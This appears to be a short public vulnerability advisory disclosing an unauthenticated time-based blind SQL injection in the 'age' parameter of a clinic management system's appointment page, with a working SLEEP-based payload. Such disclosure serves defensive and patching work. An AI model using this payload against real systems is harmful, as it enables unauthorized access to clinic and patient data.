##### Vulnerability Title : Clinic Management System Unauthenticated Blind SQL Injection (apointment.php age) Vulnerability # Date : 11/07/2016# Exploit Author : Yakir Wizman# Vendor Homepage : http://rexbd.net/software/clinic-management-system# Version : All Versions# Tested on : Apache | PHP 5.5.36 | MySQL 5.6.30######### Vendor Software Description:# Clinico – Clinic Management System is powerful, flexible, and easy to use responsive platform.# The system has control for all system modules thats enables you to develop your organization billing system and improve its effectiveness and quality.##### No authentication (login) is required to exploit this vulnerability.# Blind SQL Injection Proof-Of-Concept (Using SQLMap)# -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-# URL example : http://server/apointment.php## Page : apointment.php# Parameter : age (POST)#Type : AND/OR time-based blind#Title : MySQL >= 5.0.12 AND time-based blind#Payload : ame=Test&age=24’ AND SLEEP(5) AND 'dQNv'='dQNv&sex=on&mobile=+972-50-7655443&email=test@gmail.com&date=07/12/2016&btext=Test# ####
